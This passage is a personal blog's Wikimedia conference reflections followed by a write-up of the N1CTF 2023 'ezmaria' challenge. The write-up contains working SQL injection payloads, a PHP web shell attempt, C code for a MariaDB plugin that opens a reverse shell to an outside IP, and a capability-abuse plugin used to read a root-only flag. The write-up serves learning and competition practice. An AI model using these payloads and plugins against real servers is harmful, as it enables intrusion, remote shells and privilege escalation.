  • Using AI to generate articles that get posted, but perhaps are not properly fact checked or otherwise poor quality in ways that aren't immediately obvious or in ways existing community practice is not as of yet well prepared to handle
  • Voice assistants (alexa), LLMs (ChatGPT) and other knowledge distributions methods that use Wikipedia data but cut Wikipedia out of the loop. (A continuation of the concern that started with google knowledge graph)

I think by and large it is the third point that was the most concerning to people at the conference although all 3 were discussed at various points. The third point is also unique to Wikipedia.

There seemed to be two causes of concern for the third point. First there was worry over lack of attribution and a feeling that large silicon valley companies are exploitatively profiting off the labor of Wikipedians. Second there is concern that by Wikipedia being cut out of the loop we lose the ability to recruit people when there is no edit button and maybe even lose brand awareness. While totally unstated, I imagine the inability to show fundraising banners to users consuming via such systems probably is on the mind of the fundraising department of WMF.

My initial reaction to this is probably one of disagreement with the underlying moral basis. The goal was always to collect the world's knowledge for others to freely use. The free knowledge movement literally has free in the name. The knowledge has been collected and now other people are using it in interesting, useful and unexpected ways. Who are we to tell people what they can and cannot do with it?

This is the sort of statement that is very ideologically based. People come to Wikimedia for a variety of reasons, we are not a monolith. I imagine that people probably either agree with this view or disagree with it, and no amount of argument is going to change anyone's mind about it. Of course a major sticking point here is arguably ChatGPT is not complying with our license and lack of attribution is a reasonable concern.

The more pragmatic concerns are interesting though. The project needs new blood to continue over the long term, and if we are cut out of the distribution loop, how do we recruit? I honestly don't know, but I'd like to see actual data confirming the threat before I get too worried.

The reason I say that, is that I don't think voice assistants and LLMs are going to replace Wikipedia. They may replace Wikipedia for certain use cases but not all use cases, and especially not the use case that our recruitment base is.

Voice assistants are generally good for quick fact questions - "Who is the prime minister of Canada?" type questions. The type of stuff that has a one-sentence answer and is probably stored on Wikidata. LLMs are somewhat longer form, but still best for information that can be summarized in a few paragraphs, maybe a page at most, and has a relatively objective "right" answer (from what I hear; I haven't actually used ChatGPT). Complex, nuanced topics are not well served by these systems. Want to know the historical context that led to the current flare-up in the Middle East? I don't think LLMs will give you what you want.

Now think about the average Wikipedia editor. Are they interested in one-paragraph answers? I don't know for sure, but I would posit that they tend to be more interested in the larger, nuanced story. Yes, other distribution models may threaten our ability to recruit from users using them, but I don't think that is the target audience we would want to focus recruitment on anyways. I suppose time will tell. AI might just be a fad in the end.

Conclusion

I had a great time. It was awesome to see old friends but also meet plenty of new people I did not know. I learned quite a bit, especially about Wikipedia governance. In many ways, it is one of the more surprising wiki conferences I've been to, as it contained quite a bit of content that was new to me. I plan to write a second blog post about my more raw, unfiltered thoughts on specific presentations. (Edit: I never did make a second post, and I guess it's late enough at this point that I probably won't, so never mind about that)

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

 This weekend I participated in N1CTF. Challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021 where I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, let's see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but I didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL, so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, I did poke around information_schema to check what was in the database. There was a fake flag but no real one.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter, but then MariaDB gives us an error message about filesystem permissions. No dice. It is interesting though that I got far enough for it to be a filesystem permission error: this implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB supports a LOAD_FILE() function to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since PHP is implied, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries, only the first query, which significantly slowed down solving this problem - but more on that later.

Last of all is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\n\n`ps -ef` result\n\n";
    system("ps -ef");
    echo "\n\n`ls -l /` result\n\n";
    system("ls -l /");
    echo "\n\n`ls -l /var/www/html/` result\n\n";
    system("ls -l /var/www/html/");
    echo "\n\n`find /mysql` result\n\n";
    system("find /mysql");
    die("can you get shell?");
}


That looks promising, so let's do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql" and thus would not be able to read it. However, a hint was given out to run getcap, so presumably capabilities are in play somehow. This output does not give us any indication as to how, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here is that mariadbd is run with some non-standard options: --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting when combined with setting the plugin_dir to a non-standard location that appears to be writable by mariadb. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information, including what rights various users have - this option says not to use that database for user rights. The impact of this will become more clear later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally, plugins are dynamically loaded compiled shared object (.so or .dll) files.

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get shell. It is still unclear where to go from there, since our shell will be running as the mysql user which won't be able to read the flag. The hope is that once we have a shell we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: Write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
__attribute__((constructor))
void shell(void){
  /* Fork so the reverse shell doesn't block the thread that dlopen()ed us. */
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
            sizeof(revsockaddr));

    /* Point stdin/stdout/stderr at the socket, then hand over to a shell. */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {(char *)"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
  }
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). The function opens a connection to 167.172.208.75 (my IP address) on port 8080, connects stdin, stdout, and stderr to the socket, and executes /bin/sh, giving a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080, waiting for the connection. Once it connects I will have a shell on the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
 

Installing the plugin

I convert this to base64 and prepare a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
 
We can confirm it got there safely by running the query: 0 UNION ALL SELECT md5(load_file( "/mysql/plugin/libdaemon_example.so" )); and verifying the hash matches the local file.

The hashes match, so it's time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

Then I wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our SQL injection actually reported errors from stacked queries. Without that we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours, I eventually noticed that my file structure looked different from the one on the server. On my local computer there was a "mysql" database (in the sense of a collection of tables, not the program), whereas the server only had the ctf and information_schema databases. When compiling MariaDB locally, I had run an install script that created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally and got a helpful error message. It turns out INSTALL PLUGIN uses the mysql.plugin table internally and refuses to run if it isn't present. I dug around the MariaDB sources and found scripts/mysql_system_tables.sql, which had a definition for this table.

This also explains why the --skip-grant-tables option was set. Without it, MariaDB will abort if the mysql.global_priv table is not present, so the option is needed for MariaDB to even start in this setup.

With that in mind, I gave the following commands to the server to create the missing plugin table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now that mysql.plugin exists, let's try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of Linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (technically each thread) has a certain set of capabilities, which grant it rights it wouldn't otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process CAP_NET_BIND_SERVICE capabilities, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.
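
As a concrete (if contrived) illustration that has nothing to do with the challenge itself, a sketch like the following fails with EACCES when run as a normal user, but works after granting the binary the capability with something like sudo setcap cap_net_bind_service=+ep ./bind80 (bind80 being my made-up name for it):

#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* bind80.c (illustrative sketch): try to bind a privileged port.
 * Without root or CAP_NET_BIND_SERVICE, bind() fails with EACCES. */
int main(void) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) { perror("socket"); return 1; }

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);                /* privileged port */
    addr.sin_addr.s_addr = htonl(INADDR_ANY);

    if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("bind");                       /* EACCES if not privileged */
        return 1;
    }
    puts("bound to port 80 without being root");
    close(s);
    return 0;
}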

There are a variety of capabilities that divide up the traditional powers of root, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals to processes you don't own, and so on.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a maximum limit. Anything not in this set can never be given out or gained. On a normal system you probably have all capabilities in this set, but if you wanted to set up a restricted system, some capabilities might be removed from here to ensure it is impossible to ever gain them back.
In addition to threads having capabilities, executable files on the file system can also have capabilities. This is somewhat akin to how SUID works (although unlike SUID, this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when executed. The process will get all of these capabilities (except any missing from the bounding set) even if the parent process does not have them. It's important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally capabilities for files are displayed as capability_name=eip, where e, i and p denote which file set the capability is in (e is a flag, so it has to be on for all of the capabilities or none of them).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started, regardless of the parent process; "inheritable" are the ones it can potentially gain from the parent process, but generally won't get if the parent doesn't have them in its inheritable set; and the effective flag controls whether the capabilities are on by default or whether the process has to make a syscall before they become turned on.

This is a bit complex, so let's consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inheritable set and cap_kill in its (filesystem) permitted set:
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means that when we execute it, the foo process will definitely have cap_kill in its permitted set (as long as cap_kill is in the bounding set). It might also have cap_chown in its permitted set, but only if the parent process had cap_chown in its inheritable set. However, its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, these capabilities would immediately be in the effective set without having to call cap_set_proc(). Regardless, if the foo process execve's some other child whose executable is not marked with any capabilities, the child will not inherit any of the capabilities foo has.
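
To make the "until foo calls cap_set_proc()" part concrete, here is a rough sketch of my own (the file name raise_cap.c is made up; build with -lcap) of what foo would do to move cap_kill from its permitted set into its effective set:

#include <stdio.h>
#include <sys/capability.h>

/* raise_cap.c (illustrative sketch): turn on a capability that is
 * already in the permitted set but not yet effective.
 * Build with: gcc -o raise_cap raise_cap.c -lcap */
int main(void) {
    cap_t caps = cap_get_proc();              /* current thread's capability sets */
    if (caps == NULL) { perror("cap_get_proc"); return 1; }

    cap_value_t wanted[] = { CAP_KILL };
    /* Mark CAP_KILL as "on" in the effective set of our local copy... */
    if (cap_set_flag(caps, CAP_EFFECTIVE, 1, wanted, CAP_SET) == -1) {
        perror("cap_set_flag"); return 1;
    }
    /* ...and apply it. This only succeeds if CAP_KILL is already permitted. */
    if (cap_set_proc(caps) == -1) {
        perror("cap_set_proc"); return 1;
    }
    cap_free(caps);
    puts("CAP_KILL is now in the effective set");
    return 0;
}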


I've simplified this somewhat, see capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, let's get back to the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So the MariaDB client has the cap_setfcap capability. It is marked effective and permitted, which means the process always gets it and it is turned on by default when the client is executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb, with its CAP_SETFCAP capability, to give another executable the CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means bypassing file permission checks, which would allow us to read any file.

My initial thought was to use the \! command in the mariadb client, which lets you run shell commands, to run setcap(8). However, it quickly became obvious that this wouldn't work. Since these capabilities are only in the permitted and effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell's executable would also have to be marked as inheriting them for them to carry over. Thus any subshell we spawn is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to the mariadbd server supporting plugins, the mariadb client also supports plugins, which are used to support custom authentication methods.
 
In MariaDB, users can be authenticated via plugins, and these server-side authentication plugins can also have a client-side component. If you try to log in as a user marked as using one of these plugins, the MariaDB client will automatically try to load (dlopen()) the relevant client-side plugin.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server-side part of this is from plugin/auth_examples/dialog_examples.c. The only change I made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (it was previously 0). This was needed for MariaDB to load the plugin in the default configuration. For clarity's sake: although the file is named dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

#include <stdio.h>
#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

__attribute__((constructor))
void foo(void) {
        /* Give /mysql/priv the ability to bypass file permission checks. */
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) { handle_error( "cap_from_text" ); return; }
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
        cap_free( cap );
}


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code essentially says: when the plugin is loaded, change the file capabilities of /mysql/priv to cap_dac_override=epi (the i is probably unnecessary), thus allowing that program to read any file.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to log in to a mariadb server as a user that requires the dialog/two_questions authentication method.
 
Normally this would be pretty easy: just run CREATE USER. However, that uses the grant tables, which are explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (or, I suppose, just use a server on a different host; I didn't think of that at the time, but it probably would have been simpler). However, it turns out that even if the server starts with the grant tables disabled, you can enable them after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist yet, and the normal methods of adding entries (the CREATE USER command) won't work until they do. Thus we have to create the tables ourselves and make the appropriate entries manually.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the SQL injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"**6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary: I use the -n option to ensure mariadb flushes output after each query; since we don't have a pseudo-terminal, output would otherwise show up far too late.

I switch to the special mysql database we created earlier. I had already created the plugin table, and now I use SOURCE to create the other default tables for the mysql database (the mysql_system_tables.sql file was already present on the server). Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES, the new permissions take effect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo2 -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysql/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of MariaDB and was a good excuse to finally commit the time to understanding how Linux capabilities actually work.

The biggest challenge was figuring out that the mysql.plugin table was needed to load a plugin. It probably would have been a lot less frustrating if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The CTF organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that, since giving mariadb random capabilities it can't even use is not something likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far, and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figured it might be some really involved thing, and decided to work on other problems instead. In a way I'm kind of surprised that getcap wasn't output from the secret command to give people more of a direct hint; other more obvious things were, after all. For that matter, it is kind of weird that ls doesn't mark files with capabilities in any special way like it would a SUID binary. I know it's not stored in the traditional file mode, but I nonetheless found it a little surprising how well hidden it is from traditional cli tools that capabilities are in play.